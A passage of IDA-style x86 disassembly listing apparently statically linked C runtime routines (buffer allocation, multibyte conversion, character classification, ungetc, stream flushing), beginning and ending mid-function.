push eax
call ds:dword_4942C0
jmp short loc_4270E8
; ---------------------------------------------------------------------------
loc_4270E6: ; CODE XREF: sub_426F40+BC�j
xor eax, eax
loc_4270E8: ; CODE XREF: sub_426F40+79�j
; sub_426F40+B0�j ...
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_426F40 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427100 proc near ; CODE XREF: sub_41E810+137�p
; sub_421790+A1�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
loc_427107: ; CODE XREF: sub_427100+2F�j
cmp [ebp+arg_0], 0
jnz short loc_42712B
push offset aStrNull ; "str != NULL"
push 0
push 2Eh
push offset a_getbuf_c ; "_getbuf.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_42712B
int 3 ; Trap to Debugger
loc_42712B: ; CODE XREF: sub_427100+B�j
; sub_427100+28�j
xor eax, eax
test eax, eax
jnz short loc_427107
mov ecx, dword_492154
add ecx, 1
mov dword_492154, ecx
mov edx, [ebp+arg_0]
mov [ebp+var_4], edx
push 3Bh
push offset a_getbuf_c ; "_getbuf.c"
push 2
push 1000h
call sub_416A30
add esp, 10h
mov ecx, [ebp+var_4]
mov [ecx+8], eax
mov edx, [ebp+var_4]
cmp dword ptr [edx+8], 0
jz short loc_427186
mov eax, [ebp+var_4]
mov ecx, [eax+0Ch]
or ecx, 8
mov edx, [ebp+var_4]
mov [edx+0Ch], ecx
mov eax, [ebp+var_4]
mov dword ptr [eax+18h], 1000h
jmp short loc_4271AB
; ---------------------------------------------------------------------------
loc_427186: ; CODE XREF: sub_427100+69�j
mov ecx, [ebp+var_4]
mov edx, [ecx+0Ch]
or edx, 4
mov eax, [ebp+var_4]
mov [eax+0Ch], edx
mov ecx, [ebp+var_4]
add ecx, 14h
mov edx, [ebp+var_4]
mov [edx+8], ecx
mov eax, [ebp+var_4]
mov dword ptr [eax+18h], 2
loc_4271AB: ; CODE XREF: sub_427100+84�j
mov ecx, [ebp+var_4]
mov edx, [ebp+var_4]
mov eax, [edx+8]
mov [ecx], eax
mov ecx, [ebp+var_4]
mov dword ptr [ecx+4], 0
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_427100 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4271D0 proc near ; CODE XREF: sub_41E810+127�p
; sub_423FC0+40�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
cmp eax, dword_492520
jb short loc_4271E2
xor eax, eax
jmp short loc_427200
; ---------------------------------------------------------------------------
loc_4271E2: ; CODE XREF: sub_4271D0+C�j
mov ecx, [ebp+arg_0]
sar ecx, 5
mov edx, [ebp+arg_0]
and edx, 1Fh
imul edx, 24h
mov eax, dword_492420[ecx*4]
movsx eax, byte ptr [eax+edx+4]
and eax, 40h
loc_427200: ; CODE XREF: sub_4271D0+10�j
pop ebp
retn
sub_4271D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427210 proc near ; CODE XREF: sub_41EA90+3CA�p
; sub_41EA90+B90�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 8
push offset dword_49274C
call ds:dword_494418
cmp dword_492748, 0
jz short loc_427248
push offset dword_49274C
call ds:dword_494414
push 13h
call sub_41BC90
add esp, 4
mov [ebp+var_4], 1
jmp short loc_42724F
; ---------------------------------------------------------------------------
loc_427248: ; CODE XREF: sub_427210+18�j
mov [ebp+var_4], 0
loc_42724F: ; CODE XREF: sub_427210+36�j
mov ax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_427290
add esp, 8
mov [ebp+var_8], eax
cmp [ebp+var_4], 0
jz short loc_427275
push 13h
call sub_41BD30
add esp, 4
jmp short loc_427280
; ---------------------------------------------------------------------------
loc_427275: ; CODE XREF: sub_427210+57�j
push offset dword_49274C
call ds:dword_494414
loc_427280: ; CODE XREF: sub_427210+63�j
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn
sub_427210 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427290 proc near ; CODE XREF: sub_427210+48�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 8
cmp [ebp+arg_0], 0
jnz short loc_4272A3
xor eax, eax
jmp loc_42732C
; ---------------------------------------------------------------------------
loc_4272A3: ; CODE XREF: sub_427290+A�j
cmp dword_492170, 0
jnz short loc_4272DA
mov eax, [ebp+arg_4]
and eax, 0FFFFh
cmp eax, 0FFh
jle short loc_4272CB
call sub_422F20
mov dword ptr [eax], 2Ah
or eax, 0FFFFFFFFh
jmp short loc_42732C
; ---------------------------------------------------------------------------
loc_4272CB: ; CODE XREF: sub_427290+29�j
mov ecx, [ebp+arg_0]
mov dl, byte ptr [ebp+arg_4]
mov [ecx], dl
mov eax, 1
jmp short loc_42732C
; ---------------------------------------------------------------------------
loc_4272DA: ; CODE XREF: sub_427290+1A�j
mov [ebp+var_8], 0
lea eax, [ebp+var_8]
push eax
push 0
mov ecx, dword_442F58
push ecx
mov edx, [ebp+arg_0]
push edx
push 1
lea eax, [ebp+arg_4]
push eax
push 220h
mov ecx, dword_492180
push ecx
call ds:dword_4943B0
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_427319
cmp [ebp+var_8], 0
jz short loc_427329
loc_427319: ; CODE XREF: sub_427290+81�j
call sub_422F20
mov dword ptr [eax], 2Ah
or eax, 0FFFFFFFFh
jmp short loc_42732C
; ---------------------------------------------------------------------------
loc_427329: ; CODE XREF: sub_427290+87�j
mov eax, [ebp+var_4]
loc_42732C: ; CODE XREF: sub_427290+E�j
; sub_427290+39�j ...
mov esp, ebp
pop ebp
retn
sub_427290 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427330 proc near ; CODE XREF: sub_41FBE0+74E�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push offset dword_49274C
call ds:dword_494418
cmp dword_492748, 0
jz short loc_427368
push offset dword_49274C
call ds:dword_494414
push 13h
call sub_41BC90
add esp, 4
mov [ebp+var_4], 1
jmp short loc_42736F
; ---------------------------------------------------------------------------
loc_427368: ; CODE XREF: sub_427330+18�j
mov [ebp+var_4], 0
loc_42736F: ; CODE XREF: sub_427330+36�j
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_4273B0
add esp, 0Ch
mov [ebp+var_8], eax
cmp [ebp+var_4], 0
jz short loc_427398
push 13h
call sub_41BD30
add esp, 4
jmp short loc_4273A3
; ---------------------------------------------------------------------------
loc_427398: ; CODE XREF: sub_427330+5A�j
push offset dword_49274C
call ds:dword_494414
loc_4273A3: ; CODE XREF: sub_427330+66�j
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn
sub_427330 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4273B0 proc near ; CODE XREF: sub_427330+4B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
loc_4273B6: ; CODE XREF: sub_4273B0+3A�j
cmp dword_442F58, 1
jz short loc_4273E6
cmp dword_442F58, 2
jz short loc_4273E6
push offset aMb_cur_max1Mb_ ; "MB_CUR_MAX == 1 || MB_CUR_MAX == 2"
push 0
push 4Fh
push offset aMbtowc_c ; "mbtowc.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_4273E6
int 3 ; Trap to Debugger
loc_4273E6: ; CODE XREF: sub_4273B0+D�j
; sub_4273B0+16�j ...
xor eax, eax
test eax, eax
jnz short loc_4273B6
cmp [ebp+arg_4], 0
jz short loc_4273F8
cmp [ebp+arg_8], 0
jnz short loc_4273FF
loc_4273F8: ; CODE XREF: sub_4273B0+40�j
xor eax, eax
jmp loc_427509
; ---------------------------------------------------------------------------
loc_4273FF: ; CODE XREF: sub_4273B0+46�j
mov ecx, [ebp+arg_4]
movsx edx, byte ptr [ecx]
test edx, edx
jnz short loc_42741E
cmp [ebp+arg_0], 0
jz short loc_427417
mov eax, [ebp+arg_0]
mov word ptr [eax], 0
loc_427417: ; CODE XREF: sub_4273B0+5D�j
xor eax, eax
jmp loc_427509
; ---------------------------------------------------------------------------
loc_42741E: ; CODE XREF: sub_4273B0+57�j
cmp dword_492170, 0
jnz short loc_427444
cmp [ebp+arg_0], 0
jz short loc_42743A
mov ecx, [ebp+arg_4]
movzx dx, byte ptr [ecx]
mov eax, [ebp+arg_0]
mov [eax], dx
loc_42743A: ; CODE XREF: sub_4273B0+7B�j
mov eax, 1
jmp loc_427509
; ---------------------------------------------------------------------------
loc_427444: ; CODE XREF: sub_4273B0+75�j
mov ecx, [ebp+arg_4]
xor edx, edx
mov dl, [ecx]
mov eax, off_442D4C
xor ecx, ecx
mov cx, [eax+edx*2]
and ecx, 8000h
test ecx, ecx
jz short loc_4274CD
cmp dword_442F58, 1
jle short loc_4274A0
mov edx, [ebp+arg_8]
cmp edx, dword_442F58
jl short loc_4274A0
xor eax, eax
cmp [ebp+arg_0], 0
setnz al
push eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, dword_442F58
push edx
mov eax, [ebp+arg_4]
push eax
push 9
mov ecx, dword_492180
push ecx
call ds:dword_4942D4
test eax, eax
jnz short loc_4274C6
loc_4274A0: ; CODE XREF: sub_4273B0+B7�j
; sub_4273B0+C2�j
mov edx, [ebp+arg_8]
cmp edx, dword_442F58
jb short loc_4274B6
mov eax, [ebp+arg_4]
movsx ecx, byte ptr [eax+1]
test ecx, ecx
jnz short loc_4274C6
loc_4274B6: ; CODE XREF: sub_4273B0+F9�j
call sub_422F20
mov dword ptr [eax], 2Ah
or eax, 0FFFFFFFFh
jmp short loc_427509
; ---------------------------------------------------------------------------
loc_4274C6: ; CODE XREF: sub_4273B0+EE�j
; sub_4273B0+104�j
mov eax, dword_442F58
jmp short loc_427509
; ---------------------------------------------------------------------------
loc_4274CD: ; CODE XREF: sub_4273B0+AE�j
xor edx, edx
cmp [ebp+arg_0], 0
setnz dl
push edx
mov eax, [ebp+arg_0]
push eax
push 1
mov ecx, [ebp+arg_4]
push ecx
push 9
mov edx, dword_492180
push edx
call ds:dword_4942D4
test eax, eax
jnz short loc_427504
call sub_422F20
mov dword ptr [eax], 2Ah
or eax, 0FFFFFFFFh
jmp short loc_427509
; ---------------------------------------------------------------------------
loc_427504: ; CODE XREF: sub_4273B0+142�j
mov eax, 1
loc_427509: ; CODE XREF: sub_4273B0+4A�j
; sub_4273B0+69�j ...
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4273B0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
cmp dword_442F58, 1
jle short loc_427533
push 103h
mov eax, [ebp+8]
push eax
call sub_41E750
add esp, 8
mov [ebp-4], eax
jmp short loc_42754A
; ---------------------------------------------------------------------------
loc_427533: ; CODE XREF: .text:0042751B�j
mov ecx, [ebp+8]
mov edx, off_442D4C
xor eax, eax
mov ax, [edx+ecx*2]
and eax, 103h
mov [ebp-4], eax
loc_42754A: ; CODE XREF: .text:00427531�j
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
cmp dword_442F58, 1
jle short loc_427580
push 1
mov eax, [ebp+8]
push eax
call sub_41E750
add esp, 8
mov [ebp-4], eax
jmp short loc_427595
; ---------------------------------------------------------------------------
loc_427580: ; CODE XREF: .text:0042756B�j
mov ecx, [ebp+8]
mov edx, off_442D4C
xor eax, eax
mov ax, [edx+ecx*2]
and eax, 1
mov [ebp-4], eax
loc_427595: ; CODE XREF: .text:0042757E�j
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
cmp dword_442F58, 1
jle short loc_4275C0
push 2
mov eax, [ebp+8]
push eax
call sub_41E750
add esp, 8
mov [ebp-4], eax
jmp short loc_4275D5
; ---------------------------------------------------------------------------
loc_4275C0: ; CODE XREF: .text:004275AB�j
mov ecx, [ebp+8]
mov edx, off_442D4C
xor eax, eax
mov ax, [edx+ecx*2]
and eax, 2
mov [ebp-4], eax
loc_4275D5: ; CODE XREF: .text:004275BE�j
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
cmp dword_442F58, 1
jle short loc_427600
push 4
mov eax, [ebp+8]
push eax
call sub_41E750
add esp, 8
mov [ebp-4], eax
jmp short loc_427615
; ---------------------------------------------------------------------------
loc_427600: ; CODE XREF: .text:004275EB�j
mov ecx, [ebp+8]
mov edx, off_442D4C
xor eax, eax
mov ax, [edx+ecx*2]
and eax, 4
mov [ebp-4], eax
loc_427615: ; CODE XREF: .text:004275FE�j
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
cmp dword_442F58, 1
jle short loc_427643
push 80h
mov eax, [ebp+8]
push eax
call sub_41E750
add esp, 8
mov [ebp-4], eax
jmp short loc_42765A
; ---------------------------------------------------------------------------
loc_427643: ; CODE XREF: .text:0042762B�j
mov ecx, [ebp+8]
mov edx, off_442D4C
xor eax, eax
mov ax, [edx+ecx*2]
and eax, 80h
mov [ebp-4], eax
loc_42765A: ; CODE XREF: .text:00427641�j
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427670 proc near ; CODE XREF: sub_41FBE0+105�p
; sub_4210A0+24�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp dword_442F58, 1
jle short loc_427690
push 8
mov eax, [ebp+arg_0]
push eax
call sub_41E750
add esp, 8
mov [ebp+var_4], eax
jmp short loc_4276A5
; ---------------------------------------------------------------------------
loc_427690: ; CODE XREF: sub_427670+B�j
mov ecx, [ebp+arg_0]
mov edx, off_442D4C
xor eax, eax
mov ax, [edx+ecx*2]
and eax, 8
mov [ebp+var_4], eax
loc_4276A5: ; CODE XREF: sub_427670+1E�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_427670 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
cmp dword_442F58, 1
jle short loc_4276D0
push 10h
mov eax, [ebp+8]
push eax
call sub_41E750
add esp, 8
mov [ebp-4], eax
jmp short loc_4276E5
; ---------------------------------------------------------------------------
loc_4276D0: ; CODE XREF: .text:004276BB�j
mov ecx, [ebp+8]
mov edx, off_442D4C
xor eax, eax
mov ax, [edx+ecx*2]
and eax, 10h
mov [ebp-4], eax
loc_4276E5: ; CODE XREF: .text:004276CE�j
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
cmp dword_442F58, 1
jle short loc_427713
push 107h
mov eax, [ebp+8]
push eax
call sub_41E750
add esp, 8
mov [ebp-4], eax
jmp short loc_42772A
; ---------------------------------------------------------------------------
loc_427713: ; CODE XREF: .text:004276FB�j
mov ecx, [ebp+8]
mov edx, off_442D4C
xor eax, eax
mov ax, [edx+ecx*2]
and eax, 107h
mov [ebp-4], eax
loc_42772A: ; CODE XREF: .text:00427711�j
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
cmp dword_442F58, 1
jle short loc_427763
push 157h
mov eax, [ebp+8]
push eax
call sub_41E750
add esp, 8
mov [ebp-4], eax
jmp short loc_42777A
; ---------------------------------------------------------------------------
loc_427763: ; CODE XREF: .text:0042774B�j
mov ecx, [ebp+8]
mov edx, off_442D4C
xor eax, eax
mov ax, [edx+ecx*2]
and eax, 157h
mov [ebp-4], eax
loc_42777A: ; CODE XREF: .text:00427761�j
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
cmp dword_442F58, 1
jle short loc_4277B3
push 117h
mov eax, [ebp+8]
push eax
call sub_41E750
add esp, 8
mov [ebp-4], eax
jmp short loc_4277CA
; ---------------------------------------------------------------------------
loc_4277B3: ; CODE XREF: .text:0042779B�j
mov ecx, [ebp+8]
mov edx, off_442D4C
xor eax, eax
mov ax, [edx+ecx*2]
and eax, 117h
mov [ebp-4], eax
loc_4277CA: ; CODE XREF: .text:004277B1�j
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
cmp dword_442F58, 1
jle short loc_427800
push 20h
mov eax, [ebp+8]
push eax
call sub_41E750
add esp, 8
mov [ebp-4], eax
jmp short loc_427815
; ---------------------------------------------------------------------------
loc_427800: ; CODE XREF: .text:004277EB�j
mov ecx, [ebp+8]
mov edx, off_442D4C
xor eax, eax
mov ax, [edx+ecx*2]
and eax, 20h
mov [ebp-4], eax
loc_427815: ; CODE XREF: .text:004277FE�j
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
cmp dword ptr [ebp+8], 80h
sbb eax, eax
neg eax
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, [ebp+8]
and eax, 7Fh
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
sub esp, 8
cmp dword_442F58, 1
jle short loc_427865
push 103h
mov eax, [ebp+8]
push eax
call sub_41E750
add esp, 8
mov [ebp-4], eax
jmp short loc_42787C
; ---------------------------------------------------------------------------
loc_427865: ; CODE XREF: .text:0042784D�j
mov ecx, [ebp+8]
mov edx, off_442D4C
xor eax, eax
mov ax, [edx+ecx*2]
and eax, 103h
mov [ebp-4], eax
loc_42787C: ; CODE XREF: .text:00427863�j
cmp dword ptr [ebp-4], 0
jnz short loc_427891
cmp dword ptr [ebp+8], 5Fh
jz short loc_427891
mov dword ptr [ebp-8], 0
jmp short loc_427898
; ---------------------------------------------------------------------------
loc_427891: ; CODE XREF: .text:00427880�j
; .text:00427886�j
mov dword ptr [ebp-8], 1
loc_427898: ; CODE XREF: .text:0042788F�j
mov eax, [ebp-8]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
sub esp, 8
cmp dword_442F58, 1
jle short loc_4278C5
push 107h
mov eax, [ebp+8]
push eax
call sub_41E750
add esp, 8
mov [ebp-4], eax
jmp short loc_4278DC
; ---------------------------------------------------------------------------
loc_4278C5: ; CODE XREF: .text:004278AD�j
mov ecx, [ebp+8]
mov edx, off_442D4C
xor eax, eax
mov ax, [edx+ecx*2]
and eax, 107h
mov [ebp-4], eax
loc_4278DC: ; CODE XREF: .text:004278C3�j
cmp dword ptr [ebp-4], 0
jnz short loc_4278F1
cmp dword ptr [ebp+8], 5Fh
jz short loc_4278F1
mov dword ptr [ebp-8], 0
jmp short loc_4278F8
; ---------------------------------------------------------------------------
loc_4278F1: ; CODE XREF: .text:004278E0�j
; .text:004278E6�j
mov dword ptr [ebp-8], 1
loc_4278F8: ; CODE XREF: .text:004278EF�j
mov eax, [ebp-8]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_427900 proc near ; CODE XREF: sub_41FBE0+9D7�p
; sub_41FBE0+A65�p ...
cmp cl, 40h
jnb short loc_42791A
cmp cl, 20h
jnb short loc_427910
shld edx, eax, cl
shl eax, cl
retn
; ---------------------------------------------------------------------------
loc_427910: ; CODE XREF: sub_427900+8�j
mov edx, eax
xor eax, eax
and cl, 1Fh
shl edx, cl
retn
; ---------------------------------------------------------------------------
loc_42791A: ; CODE XREF: sub_427900+3�j
xor eax, eax
xor edx, edx
retn
sub_427900 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
loc_427927: ; CODE XREF: .text:0042794F�j
cmp dword ptr [ebp+0Ch], 0
jnz short loc_42794B
push offset aStreamNull ; "stream != NULL"
push 0
push 31h
push offset aUngetc_c ; "ungetc.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_42794B
int 3 ; Trap to Debugger
loc_42794B: ; CODE XREF: .text:0042792B�j
; .text:00427948�j
xor eax, eax
test eax, eax
jnz short loc_427927
mov ecx, [ebp+0Ch]
push ecx
call sub_421230
add esp, 4
mov edx, [ebp+0Ch]
push edx
mov eax, [ebp+8]
push eax
call sub_427990
add esp, 8
mov [ebp-4], eax
mov ecx, [ebp+0Ch]
push ecx
call sub_4212A0
add esp, 4
mov eax, [ebp-4]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427990 proc near ; CODE XREF: sub_421080+11�p
; .text:00427965�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
loc_427997: ; CODE XREF: sub_427990+2F�j
cmp [ebp+arg_4], 0
jnz short loc_4279BB
push offset aStrNull ; "str != NULL"
push 0
push 60h
push offset aUngetc_c ; "ungetc.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_4279BB
int 3 ; Trap to Debugger
loc_4279BB: ; CODE XREF: sub_427990+B�j
; sub_427990+28�j
xor eax, eax
test eax, eax
jnz short loc_427997
mov ecx, [ebp+arg_4]
mov [ebp+var_4], ecx
cmp [ebp+arg_0], 0FFFFFFFFh
jz short loc_4279F7
mov edx, [ebp+var_4]
mov eax, [edx+0Ch]
and eax, 1
test eax, eax
jnz short loc_4279FF
mov ecx, [ebp+var_4]
mov edx, [ecx+0Ch]
and edx, 80h
test edx, edx
jz short loc_4279F7
mov eax, [ebp+var_4]
mov ecx, [eax+0Ch]
and ecx, 2
test ecx, ecx
jz short loc_4279FF
loc_4279F7: ; CODE XREF: sub_427990+3B�j
; sub_427990+58�j
or eax, 0FFFFFFFFh
jmp loc_427AC7
; ---------------------------------------------------------------------------
loc_4279FF: ; CODE XREF: sub_427990+48�j
; sub_427990+65�j
mov edx, [ebp+var_4]
cmp dword ptr [edx+8], 0
jnz short loc_427A14
mov eax, [ebp+var_4]
push eax
call sub_427100
add esp, 4
loc_427A14: ; CODE XREF: sub_427990+76�j
mov ecx, [ebp+var_4]
mov edx, [ebp+var_4]
mov eax, [ecx]
cmp eax, [edx+8]
jnz short loc_427A3F
mov ecx, [ebp+var_4]
cmp dword ptr [ecx+4], 0
jz short loc_427A32
or eax, 0FFFFFFFFh
jmp loc_427AC7
; ---------------------------------------------------------------------------
loc_427A32: ; CODE XREF: sub_427990+98�j
mov edx, [ebp+var_4]
mov eax, [edx]
add eax, 1
mov ecx, [ebp+var_4]
mov [ecx], eax
loc_427A3F: ; CODE XREF: sub_427990+8F�j
mov edx, [ebp+var_4]
mov eax, [edx+0Ch]
and eax, 40h
test eax, eax
jz short loc_427A7D
mov ecx, [ebp+var_4]
mov edx, [ecx]
sub edx, 1
mov eax, [ebp+var_4]
mov [eax], edx
mov ecx, [ebp+var_4]
mov edx, [ecx]
movsx eax, byte ptr [edx]
movsx ecx, byte ptr [ebp+arg_0]
cmp eax, ecx
jz short loc_427A7B
mov edx, [ebp+var_4]
mov eax, [edx]
add eax, 1
mov ecx, [ebp+var_4]
mov [ecx], eax
or eax, 0FFFFFFFFh
jmp short loc_427AC7
; ---------------------------------------------------------------------------
loc_427A7B: ; CODE XREF: sub_427990+D7�j
jmp short loc_427A94
; ---------------------------------------------------------------------------
loc_427A7D: ; CODE XREF: sub_427990+BA�j
mov edx, [ebp+var_4]
mov eax, [edx]
sub eax, 1
mov ecx, [ebp+var_4]
mov [ecx], eax
mov edx, [ebp+var_4]
mov eax, [edx]
mov cl, byte ptr [ebp+arg_0]
mov [eax], cl
loc_427A94: ; CODE XREF: sub_427990:loc_427A7B�j
mov edx, [ebp+var_4]
mov eax, [edx+4]
add eax, 1
mov ecx, [ebp+var_4]
mov [ecx+4], eax
mov edx, [ebp+var_4]
mov eax, [edx+0Ch]
and al, 0EFh
mov ecx, [ebp+var_4]
mov [ecx+0Ch], eax
mov edx, [ebp+var_4]
mov eax, [edx+0Ch]
or al, 1
mov ecx, [ebp+var_4]
mov [ecx+0Ch], eax
mov eax, [ebp+arg_0]
and eax, 0FFh
loc_427AC7: ; CODE XREF: sub_427990+6A�j
; sub_427990+9D�j ...
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_427990 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427AD0 proc near ; CODE XREF: sub_421210+13�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_4], 0
push 2
call sub_41BC90
add esp, 4
mov [ebp+var_8], 3
jmp short loc_427AF9
; ---------------------------------------------------------------------------
loc_427AF0: ; CODE XREF: sub_427AD0:loc_427B94�j
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
loc_427AF9: ; CODE XREF: sub_427AD0+1E�j
mov ecx, [ebp+var_8]
cmp ecx, dword_493760
jge loc_427B99
mov edx, [ebp+var_8]
mov eax, dword_492750
cmp dword ptr [eax+edx*4], 0
jz short loc_427B94
mov ecx, [ebp+var_8]
mov edx, dword_492750
mov eax, [edx+ecx*4]
mov ecx, [eax+0Ch]
and ecx, 83h
test ecx, ecx
jz short loc_427B51
mov edx, [ebp+var_8]
mov eax, dword_492750
mov ecx, [eax+edx*4]
push ecx
call sub_419740
add esp, 4
cmp eax, 0FFFFFFFFh
jz short loc_427B51
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
loc_427B51: ; CODE XREF: sub_427AD0+5D�j
; sub_427AD0+76�j
cmp [ebp+var_8], 14h
jl short loc_427B94
mov eax, [ebp+var_8]
mov ecx, dword_492750
mov edx, [ecx+eax*4]
add edx, 20h
push edx
call ds:dword_494310
push 2
mov eax, [ebp+var_8]
mov ecx, dword_492750
mov edx, [ecx+eax*4]
push edx
call sub_4174C0
add esp, 8
mov eax, [ebp+var_8]
mov ecx, dword_492750
mov dword ptr [ecx+eax*4], 0
loc_427B94: ; CODE XREF: sub_427AD0+44�j
; sub_427AD0+85�j
jmp loc_427AF0
; ---------------------------------------------------------------------------
loc_427B99: ; CODE XREF: sub_427AD0+32�j
push 2
call sub_41BD30
add esp, 4
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_427AD0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427BB0 proc near ; CODE XREF: .text:loc_428042�p
; sub_4282A0:loc_428539�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
mov [ebp+var_8], 0FFFFFFFFh
push 12h
call sub_41BC90
add esp, 4
mov [ebp+var_C], 0
jmp short loc_427BDA
; ---------------------------------------------------------------------------
loc_427BD1: ; CODE XREF: sub_427BB0:loc_427D7B�j
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
loc_427BDA: ; CODE XREF: sub_427BB0+1F�j
cmp [ebp+var_C], 40h
jge loc_427D80
mov ecx, [ebp+var_C]
cmp dword_492420[ecx*4], 0
jz loc_427CE6
mov edx, [ebp+var_C]
mov eax, dword_492420[edx*4]
mov [ebp+var_4], eax
jmp short loc_427C0D
; ---------------------------------------------------------------------------
loc_427C04: ; CODE XREF: sub_427BB0+F1�j
; sub_427BB0:loc_427CD1�j
mov ecx, [ebp+var_4]
add ecx, 24h
mov [ebp+var_4], ecx
loc_427C0D: ; CODE XREF: sub_427BB0+52�j
mov edx, [ebp+var_C]
mov eax, dword_492420[edx*4]
add eax, 480h
cmp [ebp+var_4], eax
jnb loc_427CD6
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx+4]
and edx, 1
test edx, edx
jnz loc_427CD1
mov eax, [ebp+var_4]
cmp dword ptr [eax+8], 0
jnz short loc_427C79
push 11h
call sub_41BC90
add esp, 4
mov ecx, [ebp+var_4]
cmp dword ptr [ecx+8], 0
jnz short loc_427C6F
mov edx, [ebp+var_4]
add edx, 0Ch
push edx
call ds:dword_494430
mov eax, [ebp+var_4]
mov ecx, [eax+8]
add ecx, 1
mov edx, [ebp+var_4]
mov [edx+8], ecx
loc_427C6F: ; CODE XREF: sub_427BB0+A1�j
push 11h
call sub_41BD30
add esp, 4
loc_427C79: ; CODE XREF: sub_427BB0+8E�j
mov eax, [ebp+var_4]
add eax, 0Ch
push eax
call ds:dword_494304
mov ecx, [ebp+var_4]
